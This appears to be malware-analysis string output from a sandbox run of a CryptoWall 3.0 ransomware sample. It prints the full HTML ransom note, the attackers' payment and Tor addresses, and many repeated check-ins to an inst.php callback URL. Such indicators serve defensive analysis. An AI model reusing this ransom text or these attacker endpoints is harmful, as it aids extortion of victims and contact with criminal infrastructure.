Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000003.762757058.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.755159581.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.767533797.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.671880034.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000003.766203672.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.761900567.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.772593472.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.763661219.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660754432.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000003.765866382.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.764581660.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.763893449.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.771267902.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660454927.0000000003733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.765633512.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.762361432.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.770304239.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.466108647.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.773528671.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.766320207.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.762105575.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660172300.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.659735168.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.763286282.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000002.876613547.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a 